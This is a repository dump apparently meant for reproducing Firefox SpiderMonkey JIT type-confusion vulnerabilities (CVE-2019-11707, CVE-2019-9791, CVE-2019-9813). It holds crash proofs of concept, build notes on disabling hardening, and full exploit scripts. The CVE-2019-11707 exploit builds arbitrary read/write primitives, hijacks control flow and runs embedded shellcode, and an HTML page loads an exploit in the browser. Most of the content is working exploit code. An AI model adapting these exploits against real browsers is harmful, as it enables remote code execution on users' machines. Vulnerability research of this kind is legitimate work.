https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2019-11707/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2019-11707/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2019-11707 exploitation
 2 | 
 3 | **Firefox version:** 66.0.3
 4 | **Type:** Type confusion
 5 | 
 6 | ## Exploitation
 7 | 
 8 | To run the exploitation:
 9 | * build SpiderMonkey JS shell according to https://developer.mozilla.org/en-US/docs/Mozilla/Projects/SpiderMonkey/Build_Documentation
10 | * run `gdb --args ./js/src/build_DBG.OBJ/dist/bin/js ../CVE-2019-11707/exploit.js`
11 | * `handle SIGTRAP nostop`
12 | 
13 | 
14 | Reference:
15 | [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1544386
16 | [2] https://blog.bi0s.in/2019/08/18/Pwn/Browser-Exploitation/cve-2019-11707-writeup/


--------------------------------------------------------------------------------
/Firefox/CVE-2019-11707/crash.js:
--------------------------------------------------------------------------------
 1 | // Run with --no-threads for increased reliability
 2 | let ab = new ArrayBuffer(0x1000);
 3 | 
 4 | // Confuse these two types with each other below.
 5 | let x = {buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310};
 6 | let y = new Uint32Array(0x1000);
 7 | 
 8 | const v4 = [y, y, y, y, y];
 9 | function v7(v8,v9) {
10 |     if (v4.length == 0) {
11 |         v4[3] = y;
12 |     }
13 | 
14 |     // pop the last value. IonMonkey will, based on inferred types, conclude that the result
15 |     // will always be an object, which is untrue when p[0] is fetched here.
16 |     const v11 = v4.pop();
17 | 
18 |     // It will then crash here when writing to a controlled address (0x414141414141).
19 |     v11[0] = 0x1337; //crash point
20 | 
21 |     // Force JIT compilation.
22 |     for (let v15 = 0; v15 < 100000 ; v15++) {}
23 | }
24 | 
25 | var p = {};
26 | p.__proto__ = [y, y, y];
27 | p[0] = x;
28 | v4.__proto__ = p;
29 | 
30 | for (let v31 = 0; v31 < 1000; v31++) {
31 |     v7();
32 | }


--------------------------------------------------------------------------------
/Firefox/CVE-2019-11707/exploit.js:
--------------------------------------------------------------------------------
  1 | /* Utility Functions */
  2 | String.prototype.rjust = function rjust(n,chr){
  3 |   chr = chr || '0'
  4 |   if(this.length>n)
  5 |     return this.toString();
  6 |   return (chr.repeat(n)+this.toString()).slice(-1*n);
  7 | }
  8 | 
  9 | String.prototype.ljust = function ljust(n,chr){
 10 |   chr = chr || '0'
 11 |   if(this.length>n)
 12 |     return this.toString();
 13 |   return (this.toString()+chr.repeat(n)).slice(0,n);
 14 | }
 15 | 
 16 | String.prototype.hexdecode = function hexdecode(){
 17 |   inp=this.toString();
 18 |   if (this.length%2 !=0)
 19 |   inp='0'+inp.toString();
 20 |   out=[];
 21 |   for(var i=0;i<inp.length;i+=2)
 22 |   out.push(parseInt(inp.substr(i,2),16));
 23 |   return out;
 24 | }
 25 | 
 26 | function print1(num){
 27 |   rep='';
 28 |   for(var i=0;i<8;i++){
 29 |     rep+=num[i].toString(16).rjust(2);
 30 |   }
 31 |   console.log("0x"+rep.rjust(16));
 32 |   // document.getElementById("demo").innerText += "0x"+rep.rjust(16) + '\n';
 33 | }
 34 | 
 35 | 
 36 | function data(inp){
 37 |   bytes='';
 38 |   if ( (typeof inp) == 'string'){
 39 |     inp=inp.replace("0x",'');
 40 |     inp=inp.rjust(16);
 41 |     bytes=new Uint8Array(inp.hexdecode());
 42 |   }
 43 |   else if (typeof inp == 'number'){
 44 |     bytes=new Uint8Array(new Float64Array([inp]).buffer);
 45 |     bytes.reverse();
 46 |   }
 47 |   else if (typeof inp == 'object'){
 48 |     bytes=new Uint8Array(8);
 49 |     bytes.set(inp);
 50 |     bytes.reverse();
 51 |   }
 52 |   return bytes;
 53 | }
 54 | 
 55 | function inttod(num){
 56 |   num.reverse();
 57 |   temp = new Float64Array(num.buffer)[0];
 58 |   num.reverse();
 59 |   return temp;
 60 | }
 61 | 
 62 | function dtoint(num){
 63 |   int=new Uint32Array(new Float64Array([num]).buffer)
 64 |   // console.log(int[1].toString(16)+int[0].toString(16));
 65 |   return int;
 66 | }
 67 | 
 68 | function RS(inp,amt){
 69 |     amt = amt || 1;
 70 |     num='';
 71 |     for(var i=0;i<8;i++){
 72 |       num+=inp[i].toString(2).rjust(8);
 73 |     }
 74 |     num=num.slice(0,-1*amt);
 75 |     num=num.rjust(64);
 76 |     num=parseInt(num,2).toString(16).rjust(16);
 77 |     for(var i=0,j=0;i<num.length;i+=2,j++){
 78 |       inp[j]=parseInt(num.substr(i,2),16);
 79 |     }
 80 |     return inp;
 81 | }
 82 | 
 83 | function LS(inp,amt){
 84 |     amt = amt || 1;
 85 |     num='';
 86 |     for(var i=0;i<8;i++){
 87 |       num+=inp[i].toString(2).rjust(8);
 88 |     }
 89 |     num=num.slice(amt);
 90 |     num=num.ljust(64);
 91 |     num=parseInt(num,2).toString(16).rjust(16);
 92 |     for(var i=0,j=0;i<num.length;i+=2,j++){
 93 |       inp[j]=parseInt(num.substr(i,2),16);
 94 |     }
 95 |     return inp;
 96 | }
 97 | 
 98 | function sub(inp1,inp2){
 99 |     carry=0;
100 |     for(var i=inp1.length-1;i>=0;i--){
101 |         diff=inp1[i]-inp2[i]-carry;
102 |         carry=diff<0|0;
103 |         inp1[i]=diff;
104 |     }
105 |     return inp1;
106 | }
107 | 
108 | function add(inp1,inp2){
109 |     carry=0;
110 |     for(var i=inp1.length-1;i>=0;i--){
111 |         sum=inp1[i]+inp2[i]+carry;
112 |         carry=sum/0x100;
113 |         inp1[i]=(sum%0x100);
114 |     }
115 |     return inp1;
116 | }
117 | 
118 | /* Utility functions end */
119 | 
120 | 
121 | /* exploit code start */
122 | 
123 | buf = []
124 | 
125 | buf.push(new ArrayBuffer(0x20));
126 | buf.push(new ArrayBuffer(0x20));
127 | buf.push(new ArrayBuffer(0x20));
128 | buf.push(new ArrayBuffer(0x20));
129 | buf.push(new ArrayBuffer(0x20));
130 | buf.push(new ArrayBuffer(0x20));
131 | buf.push(new ArrayBuffer(0x20));
132 | buf.push(new ArrayBuffer(0x20));
133 | buf.push(new ArrayBuffer(0x20));
134 | buf.push(new ArrayBuffer(0x20));
135 | 
136 | 
137 | var abuf = buf[5];
138 | 
139 | var e = new Uint32Array(abuf);
140 | const arr = [e, e, e, e, e];
141 | 
142 | /* funtion that will trigger the bug*/
143 | 
144 | function vuln(a1) {
145 |     /*
146 |     If the length of the array becomes zero then we set the third element of
147 |     the array thus converting it into a sparse array without changing the
148 |     type of the array elements. Thus spidermonkey's Type Inference System does
149 |     not insert a type barrier.
150 |     */
151 | 
152 |     if (arr.length == 0) {
153 |         arr[3] = e;
154 |     }
155 | 
156 |     const v11 = arr.pop();
157 | 
158 |     /*
159 |     The length of the buffer is only 8, but we are trying to add to the index
160 |     at 18. This will not work, but no error will be thrown either.
161 |     When the array returned by array.pop is a Uint8Array instead of a Uint32Array,
162 |     then the size of that array is 0x20 and the index that we are trying to write
163 |     to, i.e 18, is less than that. But keep in mind that Ion still thinks that
164 |     this array is a Uint32Array and treats each element as a DWORD, thus resulting
165 |     in an overflow into the metadata of the following ArrayBuffer.
166 |     Here we are overwriting the size field of the following ArrayBuffer with a large
167 |     size, thus leading to an overflow in the data buffer of the following ArrayBuffer
168 |     i.e buf[6]
169 |     */
170 |     v11[a1] = 0x80
171 | 
172 |     for (let v15 = 0; v15 < 1000000; v15++) {} // JIT compile this function
173 | }
174 | /*
175 |   Add a prototype to the arr arrray prototype chain and set the zero'th
176 |   element as a Uint8Array to trigger the type confussion
177 | */
178 | 
179 | p = [new Uint8Array(abuf), e, e];
180 | arr.__proto__ = p;
181 | 
182 | for (let v31 = 0; v31 < 2000; v31++) {
183 |     vuln(18);
184 | }
185 | 
186 | /*
187 |   Now the size of the ArrayBufffer which is located at the sixth index is 0x80
188 |   whereas it's data buffer is only 0x20.
189 |   We use this overflow to completly control the ArrayBuffer at the 7th index
190 | */
191 | leaker = new Uint8Array(buf[7]);
192 | aa = new Uint8Array(buf[6]);
193 | 
194 | // Force a GC.
195 | // We must trigger a full GC without triggering a compacting GC,
196 | // as that might fill the holes again...
197 | // Triggering the TOO_MUCH_MALLOC condition seems to do the trick.
198 | function gc() {
199 |     const maxMallocBytes = 128 * 0x100000;
200 |     for (var i = 0; i < 3; i++) {
201 |         var x = new ArrayBuffer(maxMallocBytes);
202 |     }
203 | }
204 | gc()
205 | // this should move leaker and aa to heap instead of nursery
206 | // otherwise it fails on assertion :
207 | //            MOZ_ASSERT_IF(buffer->byteLength() > 0, !cx->nursery().isInside(ptr));
208 | // in ArrayBufferViewObject::init
209 | 
210 | /*
211 |   Now leak the contents of buf[7] to obtain leaks for a Uint Array, and an
212 |   ArrayBuffer
213 | */
214 | leak = aa.slice(0x50,0x58); // start of the Uint array
215 | group = aa.slice(0x40,0x48); // start of the array buffer
216 | slots = aa.slice(0x40,0x48);
217 | shape = aa.slice(0x40,0x48);
218 | 
219 | leak.reverse()
220 | console.log("leak (pointer to leaker)");
221 | print1(leak);
222 | 
223 | group.reverse()
224 | slots.reverse()
225 | shape.reverse()
226 | 
227 | /*
228 |    Since the pointer to the start of the data buffer is right shifted, we first
229 |    need to left shift it.
230 | */
231 | 
232 | LS(group)
233 | console.log("group (pointer to data buffer of buf[7])");
234 | print1(group);
235 | LS(slots)
236 | LS(shape)
237 | 
238 | /* remove the type tag */
239 | leak[0]=0
240 | leak[1]=0
241 | 
242 | /* Get to the data buffer of the Uint array */
243 | add(leak,new data("0x38"))
244 | console.log("leak pointing to data buffer of leaker (Uint8Array of buff[7])");
245 | print1(leak);
246 | 
247 | RS(leak)
248 | leak.reverse()
249 | console.log("shift and reverse back leak");
250 | console.log(leak)
251 | print1(leak);
252 | /*
253 |   Set the data pointer of buf[7] using the overflow in buf[6]
254 |   We set this pointer to point to the the address of the data pointer field of
255 |   the Unit that we leaked.
256 |   Thus next time a view is created using this modified ArrayBuffer, it's data pointer
257 |   will point to the data pointer of the Uint array! So when we write something to
258 |   this view, then the data pointer of the leaked Uint array will be overwritten.
259 |   So we now have the power to control the data pointer a Uint array. Thus we can
260 |   leak from any address we want and write to any address just by overwritting the
261 |   data pointer of the Uint Array and viewing/writing to the Uint array.
262 |   Thus we now effectively have an arbitrary read-write primitive!
263 | */
264 | 
265 | for (var i=0;i<leak.length;i++)
266 |   aa[0x40+i] = leak[i]
267 | 
268 | leak.reverse()
269 | LS(leak)
270 | sub(leak,new data("0x10"))
271 | console.log("leak points to the length of leaker (Uint8Array(buf[7]))");
272 | print1(leak);
273 | leak.reverse()
274 | 
275 | changer = new Uint8Array(buf[7])
276 | 
277 | // ----------- Read-Write Primitive -----------------
278 | function write(addr,value){
279 |     for (var i=0;i<8;i++)
280 |       changer[i]=addr[i]
281 |     value.reverse()
282 |     for (var i=0;i<8;i++)
283 |       leaker[i]=value[i]
284 | }
285 | 
286 | function read(addr){
287 |     for (var i=0;i<8;i++)
288 |       changer[i]=addr[i]
289 |     return leaker.slice(0,8)
290 | }
291 | 
292 | function read_n(addr, n){
293 |     console.log("read_n: changing the length of leaker first:");
294 |     write(leak,n)
295 |     for (var i=0;i<8;i++)
296 |       changer[i]=addr[i]
297 |     return leaker
298 | }
299 | 
300 | // test
301 | /*
302 | invalidAddr = new Uint8Array([65,65,65,65,65,65,65,65]);
303 | test = read(invalidAddr);
304 | Math.cos(1);
305 | console.log(test);
306 | */
307 | // above gives a segmentation fault of reading invalid address 0x4141414141414141
308 | 
309 | 
310 | // -------------------- control hijack ---------------------
311 | sub(group,new data("0x40")) // this now points to the group member
312 | sub(slots,new data("0x30")) // this now points to the slots member
313 | sub(shape,new data("0x38")) // this now points to the shape member
314 | 
315 | console.log("group now points to the group of buf[7]")
316 | print1(group)
317 | console.log("slot now points to the slot of buf[7]")
318 | print1(slots)
319 | console.log("shape now points to the shape of buf[7]")
320 | print1(shape)
321 | group.reverse()
322 | slots.reverse()
323 | shape.reverse()
324 | 
325 | aa = read(group) // aa now contains the group pointer
326 | aa.reverse()
327 | console.log("aa is group pointer:")
328 | print1(aa)
329 | aa.reverse()
330 | 
331 | grp_ptr = read(aa) // grp_ptr is now the clasp_ pointer
332 | grp_ptr.reverse()
333 | console.log("grp_prt: clasp_pointer:")
334 | print1(grp_ptr)
335 | grp_ptr.reverse()
336 | 
337 | /* stager shellode */
338 | buf[7].func = function func() {
339 |   const magic = 4.183559446463817e-216;
340 | 
341 |   const g1 = 1.4501798452584495e-277
342 |   const g2 = 1.4499730218924257e-277
343 |   const g3 = 1.4632559875735264e-277
344 |   const g4 = 1.4364759325952765e-277
345 |   const g5 = 1.450128571490163e-277
346 |   const g6 = 1.4501798485024445e-277
347 |   const g7 = 1.4345589835166586e-277
348 |   const g8 = 1.616527814e-314
349 | }
350 | 
351 | /* JIT compile the shellcode */
352 | for (i=0;i<1000000;i++) buf[7].func()
353 | 
354 | /* get the address of the executable region where Ion code is located */
355 | slots_ptr = read(slots)
356 | slots_ptr.reverse()
357 | console.log("slots_ptr:")
358 | print1(slots_ptr)
359 | slots_ptr.reverse()
360 | 
361 | func_ptr = read(slots_ptr)
362 | func_ptr[6]=0
363 | func_ptr[7]=0
364 | func_ptr.reverse()
365 | console.log("func_ptr:")
366 | print1(func_ptr)
367 | func_ptr.reverse()
368 | 
369 | func_ptr.reverse()
370 | add(func_ptr,new data("0x30"))
371 | func_ptr.reverse()
372 | 
373 | func_ptr.reverse()
374 | console.log("func_ptr added 0x30,")
375 | print1(func_ptr)
376 | func_ptr.reverse()
377 | 
378 | jit_ptr=read(func_ptr);
379 | jit_ptr.reverse()
380 | console.log("jit_ptr: pointer to first props of buf[7] (the new function)")
381 | print1(jit_ptr)
382 | jit_ptr.reverse()
383 | 
384 | jitaddr = read(jit_ptr);
385 | 
386 | /*
387 |   Find the address of the shellcode in the executable page.
388 |   We go back one page and then search 2 pages from there2
389 | */
390 | 
391 | jitaddr[0]=0
392 | jitaddr[1]=jitaddr[1] & 0xf0
393 | 
394 | jitaddr.reverse()
395 | console.log("jitaddr go back 1 page")
396 | print1(jitaddr)
397 | jitaddr.reverse()
398 | 
399 | jitaddr.reverse()
400 | sub(jitaddr,new data("0xff0"))
401 | jitaddr.reverse()
402 | 
403 | for(j=0;j<3;j++){
404 |   asdf = read_n(jitaddr,new data("0xfff8800000000ff0"))
405 |   offset=-1;
406 |   for (var i =0;i<0xff0;i++)
407 |   {
408 |     if (asdf[i]==0x37 && asdf[i+1]==0x13 && asdf[i+2]==0x37 && asdf[i+3]==0x13 && asdf[i+4]==0x37 && asdf[i+5]==0x13 && asdf[i+6]==0x37 && asdf[i+7]==0x13){
409 |       offset=i;
410 |       break
411 |     }
412 |   }
413 | 
414 |   // we found the shellcode
415 |   if(offset!=-1)
416 |     break
417 | 
418 |   jitaddr.reverse()
419 |   add(jitaddr,new data("0xff0"))
420 |   jitaddr.reverse()
421 | }
422 | 
423 | if (offset != -1) {
424 |   console.log("we found the shellCode!!!");
425 | }
426 | 
427 | 
428 | offset = offset+8+6 // add the offset of the magic constant and also the mov instruction
429 | jitaddr.reverse()
430 | add(jitaddr,new data(offset.toString(16)))
431 | console.log("jitaddr:");
432 | print1(jitaddr);
433 | jitaddr.reverse()
434 | print1(jitaddr);
435 | 
436 | console.log("now start to deal with class");
437 | group.reverse();
438 | console.log("group");
439 | print1(group);
440 | group.reverse();
441 | 
442 | aa.reverse()
443 | console.log("aa is group pointer:")
444 | print1(aa)
445 | aa.reverse()
446 | 
447 | console.log("grp_ptr:");
448 | grp_ptr.reverse();
449 | print1(grp_ptr);
450 | grp_ptr.reverse();
451 | 
452 | // JS Class object
453 | jsClass = read_n(grp_ptr,new data("0xfff8800000000030"));
454 | 
455 | console.log("jsClass:", jsClass);
456 | 
457 | name = jsClass.slice(0,8)
458 | flags = jsClass.slice(8,16)
459 | cOps = jsClass.slice(16,24)
460 | spec = jsClass.slice(24,32)
461 | ext = jsClass.slice(40,48)
462 | oOps = jsClass.slice(56,64)
463 | 
464 | console.log("old cOps");
465 | print1(cOps);
466 | 
467 | group.reverse()
468 | add(group,new data("0x60"))
469 | console.log("group added 0x60:")
470 | print1(group)
471 | group.reverse()
472 | 
473 | eight = new data("0x8")
474 | 
475 | function addEight()
476 | {
477 |   group.reverse()
478 |   add(group,eight)
479 |   group.reverse()
480 | }
481 | 
482 | function write1(addr,value){
483 |     for (var i=0;i<8;i++)
484 |       changer[i]=addr[i]
485 |     // value.reverse()
486 |     for (var i=0;i<8;i++)
487 |       leaker[i]=value[i]
488 | }
489 | 
490 | // We will be writting our crafted group to this address. So we save it now
491 | backingbuffer = group.slice(0,8)
492 | console.log("backingbuffer:");
493 | console.log(backingbuffer);
494 | backingbuffer.reverse();
495 | print1(backingbuffer);
496 | backingbuffer.reverse(); //should be the same as group
497 | 
498 | oops = group.slice(0,8)
499 | oops.reverse()
500 | add(oops,new data("0x30"))
501 | console.log("oops:");
502 | print1(oops);
503 | oops.reverse()
504 | 
505 | write1(group,name)
506 | addEight()
507 | write1(group,flags)
508 | addEight()
509 | write1(group,oops)
510 | addEight()
511 | write1(group,spec)
512 | addEight()
513 | write1(group,ext)
514 | addEight()
515 | write1(group,oOps)
516 | addEight()
517 | 
518 | // set the addProperty function pointer to our shellcode
519 | write1(group,jitaddr)
520 | 
521 | sc_buffer = new Uint8Array(0x1000);
522 | 
523 | buf[7].asdf=sc_buffer
524 | 
525 | // Leak the address of the shellcode UnitArray
526 | slots_ptr.reverse()
527 | add(slots_ptr,eight)
528 | slots_ptr.reverse()
529 | 
530 | sc_buffer_addr = read(slots_ptr)
531 | sc_buffer_addr[6]=0
532 | sc_buffer_addr[7]=0
533 | 
534 | // Now get to the buffer of the shellcode array
535 | sc_buffer_addr.reverse()
536 | add(sc_buffer_addr,new data("0x38"))
537 | console.log("the address of buffer of the shellcode array");
538 | print1(sc_buffer_addr);
539 | sc_buffer_addr.reverse()
540 | 
541 | // ptr is the pointer to the shellcode (currenty it's rw)
542 | ptr = read(sc_buffer_addr)
543 | 
544 | ptr.reverse()
545 | print1(ptr)
546 | ptr.reverse()
547 | 
548 | // convert the pointer to the shellcode buffer to float
549 | ptr.reverse()
550 | ss=inttod(ptr)
551 | ptr.reverse()
552 | 
553 | // Shellcode for execve("/usr/bin/xcalc",[],["DISPLAY=:0"])
554 | sc = [72, 141, 61, 73, 0, 0, 0, 72, 49, 246, 86, 87, 84, 94, 72, 49, 210, 82, 72, 141, 21, 87, 0, 0, 0, 82, 84, 90, 176, 59, 15, 5, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 47, 117, 115, 114, 47, 98, 105, 110, 47, 120, 99, 97, 108, 99, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 68, 73, 83, 80, 76, 65, 89, 61, 58, 48, 0]
555 | 
556 | // Copy the shellcode to the shellcode buffer
557 | for(var i=0;i<sc.length;i++)
558 |   sc_buffer[i]=sc[i]
559 | 
560 | write1(aa,backingbuffer)
561 | 
562 | // string property does not work, should use indexed property
563 | buf[7][3]=ss
564 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2019-11707/index.html:
--------------------------------------------------------------------------------
1 | <html>
2 | <body>
3 | 
4 | <script src="exploit2.js">
5 | </script>
6 | 
7 | </body>
8 | </html>


--------------------------------------------------------------------------------
/Firefox/CVE-2019-9791/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2019-9791/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2019-9791/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-9791
2 | 
3 | **Firefox version:** 63.0.1
4 | **Type:** Type confusion
5 | 
6 | 
7 | Reference
8 | [1] https://www.exploit-db.com/exploits/46613


--------------------------------------------------------------------------------
/Firefox/CVE-2019-9791/crash.js:
--------------------------------------------------------------------------------
 1 | function Hax(val, l) {
 2 |     this.a = val;
 3 | 
 4 |     for (let i = 0; i < l; i++) {}
 5 | 
 6 |     this.x = 42;
 7 |     this.y = 42;
 8 |     // After conversion to a NativeObject, this property
 9 |     // won't fit into inline storage, but out-of-line storage
10 |     // has not been allocated, resulting in a crash @ 0x0.
11 |     this.z = 42; // crash point
12 | }
13 | 
14 | for (let i = 0; i < 10000; i++) {
15 |     new Hax(13.37, 1);
16 | }
17 | let obj = new Hax("asdf", 1000000);


--------------------------------------------------------------------------------
/Firefox/CVE-2019-9791/exploit.js:
--------------------------------------------------------------------------------
  1 | /* util Functions*/
  2 | String.prototype.rjust = function rjust(n,chr){
  3 |   chr = chr || '0'
  4 |   if(this.length>n)
  5 |     return this.toString();
  6 |   return (chr.repeat(n)+this.toString()).slice(-1*n);
  7 | }
  8 | 
  9 | String.prototype.ljust = function ljust(n,chr){
 10 |   chr = chr || '0'
 11 |   if(this.length>n)
 12 |     return this.toString();
 13 |   return (this.toString()+chr.repeat(n)).slice(0,n);
 14 | }
 15 | 
 16 | String.prototype.hexdecode = function hexdecode(){
 17 |   inp=this.toString();
 18 |   if (this.length%2 !=0)
 19 |   inp='0'+inp.toString();
 20 |   out=[];
 21 |   for(var i=0;i<inp.length;i+=2)
 22 |   out.push(parseInt(inp.substr(i,2),16));
 23 |   return out;
 24 | }
 25 | 
 26 | function tobytearray(inp) {
 27 |   inp=inp.replace("0x",'');
 28 |   inp=inp.rjust(16);
 29 |   bytes=new Uint8Array(inp.hexdecode());
 30 |   return bytes;
 31 | }
 32 | 
 33 | function print1(num){
 34 |   rep='';
 35 |   for(var i=0;i<8;i++){
 36 |     rep+=num[i].toString(16).rjust(2);
 37 |   }
 38 |   console.log("0x"+rep.rjust(16));
 39 | }
 40 | 
 41 | function split(inp){
 42 |   inp = inp.replace("0x",'');
 43 |   inp = inp.ljust(16);
 44 |   sub1 = "0x" + inp.substring(0,8);
 45 |   sub2 = "0x" + inp.substring(8);
 46 |   return [sub1, sub2]
 47 | }
 48 | 
 49 | /*util ends */
 50 | 
 51 | 
 52 | buf = []
 53 | buf.push(new ArrayBuffer(0x20));
 54 | buf.push(new ArrayBuffer(0x20));
 55 | buf.push(new ArrayBuffer(0x20));
 56 | buf.push(new ArrayBuffer(0x20));
 57 | buf.push(new ArrayBuffer(0x20));
 58 | buf.push(new ArrayBuffer(0x20));
 59 | buf.push(new ArrayBuffer(0x20));
 60 | buf.push(new ArrayBuffer(0x20));
 61 | buf.push(new ArrayBuffer(0x20));
 62 | buf.push(new ArrayBuffer(0x20));
 63 | 
 64 | var abuf = buf[5];
 65 | victim = new Uint32Array(abuf);
 66 | victim.fill(0x45464645);
 67 | 
 68 | let ab = new ArrayBuffer(0x1000);
 69 |    function Hax(val, l, trigger) {
 70 |        // In the final invocation:
 71 | 
 72 |        // Ultimately confuse these two objects which each other.
 73 |        // x will (eventually) be an UnboxedObject, looking a bit like an ArrayBufferView object... :)
 74 |        let x = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: []};
 75 |        // y is a real ArrayBufferView object.
 76 |        let y = new Uint32Array(0x20);
 77 | 
 78 |        // * Trigger a conversion of |this| to a NativeObject.
 79 |        // * Update Hax's template type to NativeObject with .a and .x (and potentially .y)
 80 |        // * Trigger the "roll back" of |this| to a NativeObject with only property .a
 81 |        // * Bailout of the JITed code due to type inference changes
 82 |        this.a = val;
 83 | 
 84 |        // Trigger JIT compilation and OSR entry here. During compilation, IonMonkey will
 85 |        // incorrectly assume that |this| already has the final type (so already has property .x)
 86 |        for (let i = 0; i < l; i++) {}
 87 | 
 88 |        // The JITed code will now only have a property store here and won't update the Shape.
 89 |        this.x = x;
 90 | 
 91 |        if (trigger) {
 92 |            // This property definition is conditional (and rarely used) so that an inline cache
 93 |            // will be emitted for it, which will inspect the Shape of |this|. As such, .y will
 94 |            // be put into the same slot as .x, as the Shape of |this| only shows property .a.
 95 |            this.y = y;
 96 | 
 97 |            // At this point, .x and .y overlap, and the JITed code below believes that the slot
 98 |            // for .x still stores the UnboxedObject while in reality it now stores a Float64Array.
 99 |        }
100 | 
101 |        // This assignment will then corrupt the data pointer of the Float64Array to point to |victim|.
102 |        this.x.data = victim;
103 |    }
104 | 
105 |    for (let i = 0; i < 100000; i++) {
106 |        new Hax(1337, 1, false);
107 |    }
108 |    let obj = new Hax("asdf", 10000000, true);
109 | 
110 |    let driver = obj.y;
111 | 
112 |    // --------------------- rw primitive --------------------
113 |    // size
114 |    // driver[10] = 0x80;
115 | 
116 |    // data pointer of victim at index 14 15 of driver
117 |    // driver[14] = 0x41414141;
118 |    // driver[15] = 0x00004141;
119 | 
120 |    function read(addr) { // addr is a string e.g 0x414141414141
121 |      sub = split(addr);
122 |      driver[15] = parseInt(sub[0]);
123 |      driver[14] = parseInt(sub[1]);
124 |      return victim.slice(0,2);
125 |    }
126 | 
127 |    function write(addr, value) {
128 |      sub = split(addr);
129 |      driver[15] = parseInt(sub[0]);
130 |      driver[14] = parseInt(sub[1]);
131 |      val = split(value);
132 |      victim[0] = val[0];
133 |      victim[1] = val[1];
134 |    }
135 | 
136 |    function read_n(addr, n) { // read n * 4 bytes
137 |      // n should be smaller than 2^32-1
138 |      driver[10] = n;
139 |      sub = split(addr);
140 |      driver[15] = parseInt(sub[0]);
141 |      driver[14] = parseInt(sub[1]);
142 |      return victim.slice(0,n);
143 |    }
144 | 
145 |    // test
146 |    write("0x414141414141", "0x00001000");
147 |    // SIGSEV


--------------------------------------------------------------------------------
/Firefox/CVE-2019-9813/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2019-9813/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2019-9813/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-9813
2 | 
3 | **Firefox version:** 63.0.3
4 | **Type:** Type Confusion
5 | 
6 | SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)
7 | 
8 | Reference
9 | [1] https://www.exploit-db.com/exploits/46646


--------------------------------------------------------------------------------
/Firefox/CVE-2019-9813/crash.js:
--------------------------------------------------------------------------------
 1 | function hax(o, changeProto) {
 2 |     if (changeProto) {
 3 |         o.p = 42;
 4 |         o.__proto__ = {};
 5 |     }
 6 |     o.p = 13.37;
 7 |     return o;
 8 | }
 9 | 
10 | for (let i = 0; i < 1000; i++) {
11 |     hax({}, false);
12 | }
13 | 
14 | for (let i = 0; i < 10000; i++) {
15 |     let o = hax({}, true);
16 |     eval('o.p'); 			// Crash here
17 | }
18 | 


--------------------------------------------------------------------------------
/Firefox/README.md:
--------------------------------------------------------------------------------
  1 | # Reproducing Firefox vulnerabilities
  2 | 
  3 | [Getting the code](#getting-the-code)
  4 | 
  5 | [Configuration](#configuration)
  6 | 
  7 | [Build](#build)
  8 | 
  9 | [Troubleshooting during build](#troubleshooting_during_build)
 10 | 
 11 | [Make JS Shell](#make_js_shell_optional)
 12 | 
 13 | [Hack](#hack)
 14 | 
 15 | [Run](#run)
 16 | 
 17 | OS: Ubuntu 64-bit
 18 | 
 19 | ## Getting the code
 20 | 
 21 | Two ways:
 22 | 
 23 | :one: Get from Mercurial repository:
 24 | 
 25 | ```
 26 | hg clone https://hg.mozilla.org/releases/mozilla-release/ <foldername> -u <revision>
 27 | ```
 28 | 
 29 | where <revision> is the changeset hash found in [here](https://hg.mozilla.org/releases/mozilla-release/tags),
 30 | and if switching to another changeset:
 31 | ```
 32 | hg update -r <revision>
 33 | ```
 34 | 
 35 | :two: download from https://ftp.mozilla.org/pub/firefox/releases/
 36 | 
 37 | 
 38 | ## Configuration
 39 | 
 40 | ### normal debug build:
 41 |     ```
 42 |     echo "# for debug" > mozconfig
 43 |     echo "ac_add_options --disable-optimize" >> mozconfig
 44 |     echo "ac_add_options --enable-debug" >> mozconfig
 45 |     ```
 46 | 
 47 | an example mozconfig :point_right: [:link:](mozconfig_dbg)
 48 | 
 49 | ### ASAN build:
 50 | 
 51 | see https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer
 52 | 
 53 | an example mozconfig :point_right: [:link:](mozconfig)
 54 | 
 55 | ## Build
 56 | 
 57 | Specified a mozconfig file for build:
 58 | ```
 59 | export MOZCONFIG=/path/to/your/mozconfig
 60 | ```
 61 | 
 62 | run:
 63 | ```
 64 | ./mach bootstrap
 65 | ./mach build
 66 | ```
 67 |    
 68 | ## Troubleshooting during build
 69 | 
 70 | :point_right: [:link:](troubleshooting.md)
 71 | 
 72 | ## Make JS Shell (optional)
 73 |   ```
 74 |   cd js/src
 75 |   autoconf2.13
 76 | 
 77 |   # This name should end with "_DBG.OBJ" to make the version control system ignore it.
 78 |   mkdir build_DBG.OBJ
 79 |   cd build_DBG.OBJ
 80 |   ../configure --enable-debug --disable-optimize
 81 |   # Use "mozmake" on Windows
 82 |   make
 83 |   ```
 84 | 
 85 | ## Hack
 86 | 
 87 | ### **disable hardening flags**
 88 | 
 89 | Hardening flags are set in ```./build/moz.configure/toolchain.configure```
 90 | 
 91 | Flag that disables stack canary: ```-fno-stack-protector```
 92 | 
 93 | ### **expose garbage collection interface**
 94 | 
 95 | To expose the garbage collection function to JavaScript, below are files needed for change:
 96 | 
 97 | - ./dom/bindings/Bindings.conf
 98 | 
 99 | - ./dom/base/moz.build
